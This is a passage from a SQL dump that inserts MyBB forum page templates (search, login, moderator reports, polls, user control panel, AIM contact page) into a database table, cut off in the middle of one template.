INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('201', 'portal_latestthreads_thread', '<tr> <td class=\"{$altbg}\"> <strong><a href=\"{$mybb->settings[\'bburl\']}/{$thread[\'threadlink\']}\">{$thread[\'subject\']}</a></strong> <span class=\"smalltext\"><br /> <a href=\"{$thread[\'lastpostlink\']}\">{$lang->latest_threads_lastpost}</a> {$lastposterlink}<br /> {$lastpostdate} {$lastposttime}<br /> <strong>&raquo; </strong>{$lang->latest_threads_replies} {$thread[\'replies\']}<br /> <strong>&raquo; </strong>{$lang->latest_threads_views} {$thread[\'views\']} </span> </td> </tr>', '-2', '120', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('202', 'search', '<html> <head> <title>{$mybb->settings[\'bbname\']} - {$lang->search}</title> {$headerinclude} </head> <body> {$header} <form method=\"post\" action=\"search.php\"> <input type=\"hidden\" name=\"action\" value=\"do_search\" /> <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\"> <tr> <td colspan=\"2\" class=\"thead\"><strong>{$mybb->settings[\'bbname\']} - {$lang->search}</strong></td> </tr> <tr> <td class=\"tcat\" width=\"50%\"><strong>{$lang->search_keyword}</strong></td> <td class=\"tcat\" width=\"50%\"><strong>{$lang->search_username}</strong></td> </tr> <tr> <td class=\"trow1\"> <table><tr> <td valign=\"top\"><input type=\"text\" class=\"textbox\" name=\"keywords\" size=\"35\" maxlength=\"250\" /></td> </tr> <tr> <td> <span class=\"smalltext\"><input type=\"radio\" class=\"radio\" name=\"postthread\" value=\"1\" checked=\"checked\" />{$lang->search_entire_post}<br /><input type=\"radio\" class=\"radio\" name=\"postthread\" value=\"2\" />{$lang->search_titles_only}</span></td> </tr></table> </td> <td class=\"trow1\"> <table><tr> <td class=\"trow1\"><input type=\"text\" class=\"textbox\" id=\"author\" name=\"author\" size=\"35\" maxlength=\"{$mybb->settings[\'maxnamelength\']}\" /><br /><span class=\"smalltext\"><input type=\"checkbox\" class=\"checkbox\" name=\"matchusername\" value=\"1\" checked=\"checked\" /> {$lang->match_username}</span></td> <td class=\"trow1\">&nbsp;</td> </tr></table> </td> </tr> <tr> <td class=\"tcat\"><strong>{$lang->search_forums}</strong></td> <td class=\"tcat\"><strong>{$lang->search_options}</strong></td> </tr> <tr> <td class=\"trow1\" rowspan=\"{$rowspan}\">{$srchlist}</td> <td class=\"trow1\"> <select name=\"findthreadst\"> <option value=\"1\">{$lang->threads_at_least}</option> <option value=\"2\">{$lang->threads_at_most}</option> </select> <input type=\"text\" class=\"textbox\" name=\"numreplies\" size=\"2\" maxlength=\"4\" />&nbsp;{$lang->replies2}<br /> <br /> <select name=\"postdate\"> <option value=\"0\">{$lang->find_anydate}</option> <option value=\"1\">{$lang->find_yesterday}</option> <option value=\"7\">{$lang->find_lastweek}</option> <option value=\"14\">{$lang->find_2weeks}</option> <option value=\"30\">{$lang->find_month}</option> <option value=\"90\">{$lang->find_3months}</option> <option value=\"180\">{$lang->find_6months}</option> <option value=\"365\">{$lang->find_year}</option> </select>&nbsp;&nbsp; <input type=\"radio\" class=\"radio\" name=\"pddir\" value=\"1\" checked=\"checked\" />{$lang->and_newer} <input type=\"radio\" class=\"radio\" name=\"pddir\" value=\"0\" />{$lang->and_older}<br /> <br /> {$prefixselect} </td> </tr> <tr> <td class=\"tcat\"><strong>{$lang->sorting_options}</strong></td> </tr> <tr> <td class=\"trow1\"> <select name=\"sortby\"> <option value=\"lastpost\">{$lang->sort_lastpost}</option> <option value=\"starter\">{$lang->sort_author}</option> <option value=\"forum\">{$lang->sort_forum}</option> </select> {$lang->sort_in} <input type=\"radio\" class=\"radio\" name=\"sortordr\" value=\"asc\" />{$lang->sort_asc} <input type=\"radio\" class=\"radio\" name=\"sortordr\" value=\"desc\" checked=\"checked\" />{$lang->sort_desc} {$lang->sort_order} </td> </tr> <tr> <td class=\"tcat\"><strong>{$lang->display_options}</strong></td> </tr> <tr> <td class=\"trow1\">{$lang->show_results_as} <input type=\"radio\" class=\"radio\" name=\"showresults\" value=\"threads\" checked=\"checked\" />{$lang->show_results_threads} <input type=\"radio\" class=\"radio\" name=\"showresults\" value=\"posts\" />{$lang->show_results_posts}</td> </tr> {$moderator_options} </table> <div align=\"center\"><br /><input type=\"submit\" class=\"button\" name=\"submit\" value=\"{$lang->search}\" /></div> </form> {$footer} <script type=\"text/javascript\" src=\"jscripts/autocomplete.js?ver=1400\"></script> <script type=\"text/javascript\"> <!-- if(use_xmlhttprequest == \"1\") { new autoComplete(\"author\", \"xmlhttp.php?action=get_users\", {valueSpan: \"username\"}); } // --> </script> </body> </html> ', '-2', '1600', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('203', 'search_moderator_options', '<tr> <td class=\"tcat\"><strong>{$lang->mod_options}</strong></td> </tr> <tr> <td class=\"trow1\" valign=\"top\"> <select name=\"visible\"> <option value=\"\">{$lang->find_all}</option> <option value=\"1\">{$lang->find_only_approved}</option> <option value=\"-1\">{$lang->find_only_unapproved}</option> </select> {$lang->results} </td> </tr> ', '-2', '1600', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('204', 'postbit_groupimage', '<img src=\"{$usergroup[\'image\']}\" alt=\"{$usergroup[\'title\']}\" title=\"{$usergroup[\'title\']}\" />', '-2', '120', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('205', 'showthread_newreply', '<a href=\"newreply.php?tid={$tid}\"><img src=\"{$theme[\'imglangdir\']}/newreply.gif\" alt=\"{$lang->post_reply_img}\" title=\"{$lang->post_reply_img}\" /></a>&nbsp;', '-2', '120', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('206', 'showthread_newthread', '<a href=\"newthread.php?fid={$fid}\"><img src=\"{$theme[\'imglangdir\']}/newthread.gif\" alt=\"{$lang->post_thread}\" title=\"{$lang->post_thread}\" /></a>&nbsp;', '-2', '120', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('207', 'member_profile_groupimage', '<img src=\"{$displaygroup[\'image\']}\" alt=\"{$usertitle}\" title=\"{$usertitle}\" /><br />', '-2', '120', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('208', 'misc_help_section', '<table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\" style=\"clear: both;\"> <thead> <tr> <td class=\"thead\"><div class=\"expcolimage\"><img src=\"{$theme[\'imgdir\']}/{$expcolimage}\" id=\"sid_{$section[\'sid\']}_img\" class=\"expander\" alt=\"[-]\" title=\"[-]\" /></div><div><strong>{$section[\'name\']}</strong></div></td> </tr> </thead> <tbody style=\"{$expdisplay}\" id=\"sid_{$section[\'sid\']}_e\"> <tr> <td class=\"tcat\"><span class=\"smalltext\"><strong>{$section[\'description\']}</strong></span></td> </tr> {$helpbits} </tbody> </table> <br />', '-2', '1400', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('209', 'announcement', '<html> <head> <title>{$lang->announcements}</title> {$headerinclude} </head> <body> {$header} <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\" style=\"clear: both; border-bottom-width: 0;\"> <tr> <td class=\"thead\" colspan=\"3\"><strong>{$lang->forum_announcement}</strong></td> </tr> </table> {$announcement} {$footer} </body> </html>', '-2', '1400', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('210', 'announcement_edit', '<a href=\"modcp.php?action=edit_announcement&amp;aid={$post[\'aid\']}&amp;fid={$fid}\"><img src=\"{$theme[\'imglangdir\']}/postbit_edit.gif\" alt=\"{$lang->announcement_edit}\" title=\"{$lang->announcement_edit}\" /></a>', '-2', '1600', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('211', 'announcement_quickdelete', '<a href=\"modcp.php?action=delete_announcement&amp;aid={$post[\'aid\']}&amp;my_post_key={$mybb->post_code}\" onclick=\"if(confirm(&quot;{$lang->announcement_quickdelete_confirm}&quot;))window.location=this.href.replace(\'action=delete_announcement\',\'action=do_delete_announcement\');return false;\"><img src=\"{$theme[\'imglangdir\']}/postbit_delete.gif\" alt=\"{$lang->announcement_qdelete}\" title=\"{$lang->announcement_qdelete}\" /></a>', '-2', '1600', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('212', 'member_emailuser', '<html> <head> <title>{$mybb->settings[\'bbname\']} - {$lang->email_user}</title> {$headerinclude} </head> <body> {$header} {$errors} <form action=\"member.php\" method=\"post\" name=\"input\"> <input type=\"hidden\" name=\"my_post_key\" value=\"{$mybb->post_code}\" /> <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\"> <tr> <td colspan=\"2\" width=\"100%\" class=\"thead\"><strong>{$lang->email_user}</strong></td> </tr> <tr> <td width=\"40%\" class=\"trow2\"><strong>{$lang->email_subject}</strong></td> <td width=\"60%\" class=\"trow2\"><input type=\"text\" class=\"textbox\" size=\"50\" name=\"subject\" value=\"{$subject}\" /></td> </tr> <tr> <td valign=\"top\" width=\"40%\" class=\"trow1\"><strong>{$lang->email_message}</strong></td> <td width=\"60%\" class=\"trow1\"><textarea cols=\"50\" rows=\"10\" name=\"message\">{$message}</textarea></td> </tr> </table> <br /> <input type=\"hidden\" name=\"action\" value=\"do_emailuser\" /> <input type=\"hidden\" name=\"uid\" value=\"{$to_user[\'uid\']}\" /> <div align=\"center\"><input type=\"submit\" class=\"button\" value=\"{$lang->send_email}\" /></div> </form> {$footer} </body> </html>', '-2', '1400', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('213', 'changeuserbox', '<tr> <td class=\"trow1\" width=\"20%\"><strong>{$lang->username}</strong></td> <td class=\"trow1\">{$mybb->user[\'username\']} <span class=\"smalltext\">[<strong><a href=\"member.php?action=logout&amp;logoutkey={$mybb->user[\'logoutkey\']}\">{$lang->change_user}</a></strong>]</span></td> </tr> ', '-2', '1400', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('214', 'showthread_poll_results', '<table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\"> <tr> <td class=\"thead\" colspan=\"4\" align=\"center\"><strong>{$lang->poll} {$poll[\'question\']}</strong><br /><span class=\"smalltext\">{$pollstatus}</span></td> </tr> {$polloptions} <tr> <td class=\"tfoot\" align=\"right\" colspan=\"2\"><strong>{$lang->total}</strong></td> <td class=\"tfoot\" align=\"center\"><strong>{$lang->total_votes}</strong></td> <td class=\"tfoot\" align=\"center\"><strong>{$totpercent}</strong></td> </tr> </table> <table cellspacing=\"0\" cellpadding=\"2\" border=\"0\" width=\"100%\" align=\"center\"> <tr> <td align=\"left\"><span class=\"smalltext\">{$lang->you_voted}</span></td> <td align=\"right\"><span class=\"smalltext\">[<a href=\"polls.php?action=showresults&amp;pid={$poll[\'pid\']}\">{$lang->show_results}</a>{$edit_poll}]</span></td> </tr> </table> <br />', '-2', '120', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('215', 'polls_showresults', '<html> <head> <title>{$mybb->settings[\'bbname\']} - {$lang->poll_results}</title> {$headerinclude} </head> <body> {$header} <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\"> <tr> <td class=\"thead\" colspan=\"4\" align=\"center\"><strong>{$poll[\'question\']}</strong></td> </tr> {$polloptions} <tr> <td class=\"tfoot\" align=\"right\" colspan=\"2\"><strong>{$lang->poll_total}</strong></td> <td class=\"tfoot\" align=\"center\"><strong>{$poll[\'numvotes\']} {$lang->poll_votes}</strong></td> <td class=\"tfoot\" align=\"center\"><strong>{$totpercent}</strong></td> </tr> </table> {$footer} </body> </html>', '-2', '120', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('216', 'member_register_password', '<tr> <td><span class=\"smalltext\">{$lang->password}</span></td> <td><span class=\"smalltext\">{$lang->confirm_password}</span></td> </tr> <tr> <td><input type=\"password\" class=\"textbox\" name=\"password\" id=\"password\" style=\"width: 100%\" /></td> <td><input type=\"password\" class=\"textbox\" name=\"password2\" id=\"password2\" style=\"width: 100%\" /></td> </tr> <tr> <td colspan=\"2\" style=\"display: none;\" id=\"password_status\">&nbsp;</td> </tr> ', '-2', '1400', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('217', 'usercp_forumsubscriptions_forum', '<tr> <td class=\"trow1\" align=\"center\" valign=\"top\" width=\"1\"><img src=\"{$theme[\'imgdir\']}/{$folder}.gif\" valign=\"top\" /></td> <td class=\"trow1\" valign=\"top\"> <strong><a href=\"{$forum_url}\">{$forum[\'name\']}</a></strong><br /><span class=\"smalltext\"><a href=\"usercp2.php?action=removesubscription&amp;type=forum&amp;fid={$forum[\'fid\']}&amp;my_post_key={$mybb->post_code}\">{$lang->unsubscribe}</a> | <a href=\"newthread.php?fid={$forum[\'fid\']}\">{$lang->new_thread}</a></span></td> <td class=\"trow2\" valign=\"top\" style=\"white-space: nowrap; text-align: center;\">{$posts}</td> <td class=\"trow1\" valign=\"top\" style=\"white-space: nowrap; text-align: center;\">{$threads}</td> <td class=\"trow2\" valign=\"top\" style=\"white-space: nowrap\">{$lastpost}</td> </tr>', '-2', '1600', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('218', 'usercp_latest_subscribed', '<br /> <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\"> <tr> <td class=\"thead\" colspan=\"6\"><div class=\"float_right\"><a href=\"usercp.php?action=subscriptions\"><strong>{$lang->view_all_subscriptions}</strong></a></div><strong>{$lang->new_thread_subscriptions}</strong></td> </tr> <tr> <td class=\"tcat\" colspan=\"3\"><span class=\"smalltext\"><strong>{$lang->thread} / {$lang->author}</strong></span></td> <td class=\"tcat\" align=\"center\" width=\"75\"><span class=\"smalltext\"><strong>{$lang->replies}</strong></span></td> <td class=\"tcat\" align=\"center\" width=\"75\"><span class=\"smalltext\"><strong>{$lang->views}</strong></span></td> <td class=\"tcat\" align=\"center\" width=\"200\"><span class=\"smalltext\"><strong>{$lang->lastpost}</strong></span></td> </tr> {$latest_subscribed_threads} </table>', '-2', '1600', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('219', 'usercp_latest_subscribed_threads', '<tr> <td align=\"center\" class=\"{$bgcolor}\" width=\"2%\"><img src=\"{$theme[\'imgdir\']}/{$folder}.gif\" alt=\"{$folder_label}\" title=\"{$folder_label}\" /></td> <td align=\"center\" class=\"{$bgcolor}\" width=\"2%\">{$icon}</td> <td class=\"{$bgcolor}\">{$gotounread}{$thread[\'displayprefix\']}<a href=\"{$thread[\'threadlink\']}\" class=\"{$new_class}\">{$thread[\'subject\']}</a><br /><span class=\"smalltext\">{$thread[\'author\']}</span></td> <td align=\"center\" class=\"{$bgcolor}\"><a href=\"javascript:MyBB.whoPosted({$thread[\'tid\']});\">{$thread[\'replies\']}</a></td> <td align=\"center\" class=\"{$bgcolor}\">{$thread[\'views\']}</td> <td class=\"{$bgcolor}\" style=\"white-space: nowrap\"><span class=\"smalltext\">{$lastpostdate} {$lastposttime} <br /><a href=\"{$thread[\'lastpostlink\']}\">{$lang->lastpost}</a>: {$lastposterlink}</span> </td> </tr>', '-2', '1600', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('220', 'usercp_latest_threads', '<br /> <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\"> <tr> <td class=\"thead\" colspan=\"6\"><div class=\"float_right\"><a href=\"search.php?action=finduserthreads&amp;uid={$mybb->user[\'uid\']}\"><strong>{$lang->find_all_threads}</strong></a></div><strong>{$lang->latest_threads}</strong></td> </tr> <tr> <td class=\"tcat\" colspan=\"3\"><span class=\"smalltext\"><strong>{$lang->thread} / {$lang->author}</strong></span></td> <td class=\"tcat\" align=\"center\" width=\"75\"><span class=\"smalltext\"><strong>{$lang->replies}</strong></span></td> <td class=\"tcat\" align=\"center\" width=\"75\"><span class=\"smalltext\"><strong>{$lang->views}</strong></span></td> <td class=\"tcat\" align=\"center\" width=\"200\"><span class=\"smalltext\"><strong>{$lang->lastpost}</strong></span></td> </tr> {$latest_threads_threads} </table>', '-2', '1600', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('221', 'usercp_latest_threads_threads', '<tr> <td align=\"center\" class=\"{$bgcolor}\" width=\"2%\"><img src=\"{$theme[\'imgdir\']}/{$folder}.gif\" alt=\"{$folder_label}\" title=\"{$folder_label}\" /></td> <td align=\"center\" class=\"{$bgcolor}\" width=\"2%\">{$icon}</td> <td class=\"{$bgcolor}\">{$gotounread}{$thread[\'displayprefix\']}<a href=\"{$thread[\'threadlink\']}\" class=\"{$new_class}\">{$thread[\'subject\']}</a><br /><span class=\"smalltext\">{$thread[\'author\']}</span></td> <td align=\"center\" class=\"{$bgcolor}\"><a href=\"javascript:MyBB.whoPosted({$thread[\'tid\']});\">{$thread[\'replies\']}</a></td> <td align=\"center\" class=\"{$bgcolor}\">{$thread[\'views\']}</td> <td class=\"{$bgcolor}\" style=\"white-space: nowrap\"><span class=\"smalltext\">{$lastpostdate} {$lastposttime} <br /><a href=\"{$thread[\'lastpostlink\']}\">{$lang->lastpost}</a>: {$lastposterlink}</span> </td> </tr>', '-2', '1600', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('222', 'newthread_postpoll', '<tr> <td class=\"{$bgcolor2}\" valign=\"top\"> <strong>{$lang->poll}</strong><br /><span class=\"smalltext\">{$lang->poll_desc}</span> </td> <td class=\"{$bgcolor2}\" valign=\"top\"> <span class=\"smalltext\"><label><input type=\"checkbox\" class=\"checkbox\" name=\"postpoll\" value=\"1\" {$postpollchecked} /><strong>{$lang->poll_check}</strong></label><br /> {$lang->num_options} <input type=\"text\" class=\"textbox\" name=\"numpolloptions\" value=\"{$numpolloptions}\" size=\"10\" /> {$lang->max_options}</span> </td> </tr>', '-2', '120', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('223', 'modcp_reports_report', '<tr> <td class=\"{$trow}\" align=\"center\"><label for=\"reports_{$report[\'rid\']}\"><a href=\"{$report[\'postlink\']}#pid{$report[\'pid\']}\" target=\"_blank\">{$report[\'pid\']}</a></label></td> <td class=\"{$trow}\" align=\"center\"><a href=\"{$report[\'posterlink\']}\" target=\"_blank\">{$report[\'postusername\']}</a></td> <td class=\"{$trow}\"><a href=\"{$report[\'threadlink\']}\" target=\"_blank\">{$report[\'threadsubject\']}</a></td> <td class=\"{$trow}\" align=\"center\"><a href=\"{$report[\'reporterlink\']}\" target=\"_blank\">{$report[\'username\']}</a></td> <td class=\"{$trow}\">{$report[\'reason\']}</td> <td class=\"{$trow}\" align=\"center\" style=\"white-space: nowrap\"><span class=\"smalltext\">{$reportdate}<br />{$reporttime}</small></td> <td class=\"{$trow}\" align=\"center\"><input type=\"checkbox\" class=\"checkbox\" name=\"reports[]\" id=\"reports_{$report[\'rid\']}\" value=\"{$report[\'rid\']}\" /></td> </tr>', '-2', '1607', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('224', 'modcp_reports_multipage', '<tr> <td class=\"tcat\" colspan=\"6\"><span class=\"smalltext\"> {$multipage}</span></td> </tr>', '-2', '120', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('225', 'modcp_allreports', '<html> <head> <title>{$mybb->settings[\'bbname\']} - {$lang->all_reported_posts}</title> {$headerinclude} </head> <body> {$header} <table width=\"100%\" border=\"0\" align=\"center\"> <tr> {$modcp_nav} <td valign=\"top\"> <p>{$lang->unread_reports_key}</p> <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\"> <tr> <td class=\"thead\" align=\"center\" colspan=\"6\"><strong>{$lang->all_reported_posts}</strong></td> </tr> <tr> <td class=\"tcat\" align=\"center\" width=\"10%\"><span class=\"smalltext\"><strong>{$lang->post_id}</strong></span></td> <td class=\"tcat\" align=\"center\" width=\"15%\"><span class=\"smalltext\"><strong>{$lang->poster}</strong></span></td> <td class=\"tcat\" align=\"center\" width=\"25%\"><span class=\"smalltext\"><strong>{$lang->thread}</strong></span></td> <td class=\"tcat\" align=\"center\" width=\"15%\"><span class=\"smalltext\"><strong>{$lang->reporter}</strong></span></td> <td class=\"tcat\" align=\"center\" width=\"25%\"><span class=\"smalltext\"><strong>{$lang->report_reason}</strong></span></td> <td class=\"tcat\" align=\"center\" width=\"10%\"><span class=\"smalltext\"><strong>{$lang->report_time}</strong></span></td> </tr> {$allreports} {$allreportspages} </table> </td> </tr> </table> {$footer} </body> </html>', '-2', '120', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('226', 'modcp_reports_allreport', '<tr> <td class=\"{$trow}\" align=\"center\"><a href=\"{$report[\'postlink\']}#pid{$report[\'pid\']}\" target=\"_blank\">{$report[\'pid\']}</a></td> <td class=\"{$trow}\" align=\"center\">{$report[\'postusername\']}</td> <td class=\"{$trow}\">{$report[\'threadsubject\']}</td> <td class=\"{$trow}\" align=\"center\"><a href=\"{$report[\'reporterlink\']}\" target=\"_blank\">{$report[\'username\']}</a></td> <td class=\"{$trow}\">{$report[\'reason\']}</td> <td class=\"{$trow}\" align=\"center\" style=\"white-space: nowrap\"><span class=\"smalltext\">{$reportdate}<br />{$reporttime}</span></td> </tr>', '-2', '1400', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('227', 'modcp_reports_allnoreports', '<tr> <td class=\"trow1\" align=\"center\" colspan=\"6\">{$lang->no_reports}</td> </tr>', '-2', '120', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('228', 'modcp_reports_noreports', '<tr> <td class=\"trow1\" align=\"center\" colspan=\"7\">{$lang->no_reports}</td> </tr>', '-2', '1607', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('229', 'global_unreadreports', '<div class=\"red_alert\"><a href=\"modcp.php?action=reports\">{$lang->unread_reports}</a></div> <br />', '-2', '1600', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('230', 'global_pending_joinrequests', '<div class=\"red_alert\"><a href=\"usercp.php?action=usergroups\">{$lang->pending_joinrequests}</a></div>', '-2', '1600', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('231', 'member_loggedin_notice', '<table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\"> <tr> <td class=\"trow1\" align=\"right\"><span class=\"smalltext\">{$lang->already_logged_in}</a></span></td> </tr> </table> <br />', '-2', '1400', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('232', 'member_login', '<html> <head> <title>{$mybb->settings[\'bbname\']} - {$lang->login}</title> {$headerinclude} </head> <body> {$header} <br /> {$inline_errors} {$member_loggedin_notice} <form action=\"member.php\" method=\"post\"> <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\"> <tr> <td class=\"thead\" colspan=\"2\"><strong>{$lang->login}</strong></td> </tr> <tr> <td class=\"trow1\"><strong>{$lang->username}</strong></td> <td class=\"trow1\"><input type=\"text\" class=\"textbox\" name=\"username\" size=\"25\" maxlength=\"{$mybb->settings[\'maxnamelength\']}\" style=\"width: 200px;\" value=\"{$username}\" /></td> </tr> <tr> <td class=\"trow2\"><strong>{$lang->password}</strong><br /><span class=\"smalltext\">{$lang->pw_note}</span></td> <td class=\"trow2\"><input type=\"password\" class=\"textbox\" name=\"password\" size=\"25\" style=\"width: 200px;\" value=\"{$password}\" /> (<a href=\"member.php?action=lostpw\">{$lang->lostpw_note}</a>)</td> </tr> <tr> <td class=\"trow1\" colspan=\"2\" align=\"center\"><label title=\"{$lang->remember_me_desc}\"><input type=\"checkbox\" class=\"checkbox\" name=\"remember\" checked=\"checked\" value=\"yes\" /> {$lang->remember_me}</label></td> </tr> {$captcha} </table> <br /> <div align=\"center\"><input type=\"submit\" class=\"button\" name=\"submit\" value=\"{$lang->login}\" /></div> <input type=\"hidden\" name=\"action\" value=\"do_login\" /> <input type=\"hidden\" name=\"url\" value=\"{$redirect_url}\" /> </form> {$footer} </body> </html>', '-2', '1600', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('233', 'misc_imcenter_aim', '<html> <head> <title>{$lang->aim_center}</title> {$headerinclude} </head> <body style=\"margin:0;left:0;top:0\" class=\"trow2\"> <table width=\"100%\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" border=\"0\" align=\"center\" class=\"tborder\"> <tr> <td class=\"thead\" align=\"center\" colspan=\"2\"><strong>{$user[\'username\']} - {$lang->aim_center}</strong></td> </tr> <tr> <td class=\"tcat\" align=\"center\" colspan=\"2\"><span class=\"smalltext\"><strong>{$navigationbar}</strong></span></td> </tr> <tr> <td class=\"trow2\"> <!-- Begin AIM Remote --> <table align=\"center\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\"> <tr> <td align=\"center\" style=\"white-space: nowrap\"><a href=\"http://www.aol.co.uk/aim/index.html\"><img src=\"http://www.aol.co.uk/aim/remote/gr/aimver_man.gif\" width=\"44\" height=\"55\" alt=\"($lang->download_aim}\" title=\"($lang->download_aim}\" /></a><img src=\"http://www.aol.co.uk/aim/remote/gr/aimver_topsm.gif\" width=\"73\" height=\"55\" alt=\"{$lang->aim_remote}\" title=\"{$lang->aim_remote}\" /></td> </tr> <tr> <td align=\"center\" style=\"white-space: nowrap\"><a href=\"aim:goim?screenname={$user[\'aim\']}&amp;message=Hi.+Are+you+there?\"><img src=\"http://www.aol.co.uk/aim/remote/gr/aimver_im.gif\" width=\"117\" height=\"39\" alt=\"{$lang->send_me_instant}\" title=\"{$lang->send_me_instant}\" /></a></td> </tr> <tr> <td align=\"center\" style=\"white-space: nowrap\"><a href=\"aim:addbuddy?screenname={$user[\'aim\']}\"><img src=\"http://www.aol.co.uk/aim/remote/gr/aimver_bud.gif\" width=\"117\" height=\"39\" alt=\"{$lang->add_me_buddy_list}\" title=\"{$lang->add_me_buddy_list}\" /></a></td> </tr> <tr> <td align=\"center\" style=\"white-space: nowrap\"><a href=\"http://www.aol.co.uk/aim/remote.html\"><img src=\"http://www.aol.co.uk/aim/remote/gr/aimver_botadd.gif\" width=\"117\" height=\"23\" alt=\"($lang->add_remote_to_page}\" title=\"($lang->add_remote_to_page}\" /></a></td> </tr> <td align=\"center\" style=\"white-space: nowrap\"><a href=\"http://www.aol.co.uk/aim/index.html\"><img src=\"http://www.aol.co.uk/aim/remote/gr/aimver_botdow.gif\" width=\"117\" height=\"29\" alt=\"{$lang->download_aol_im}\" title=\"{$lang->download_aol_im}\" /></a></td> </tr> </table> <!-- End AIM Remote --> </td> </tr> </table> </body> </html>', '-2', '120', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('234', 'misc_syndication', '<html> <head> <title>{$mybb->settings[\'bbname\']} - {$lang->syndication}</title> {$headerinclude} </head> <body> {$header} {$feedurl} <table border=\"0\" cellspacing=\"0\" cellpadding=\"{$theme[\'tablespace\']}\" width=\"100%\"> <tr><td>{$lang->syndication_note}</td></tr> </table> <br /> <form method=\"post\" action=\"misc.php?action=syndication\"> <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\"> <tr> <td class=\"thead\" 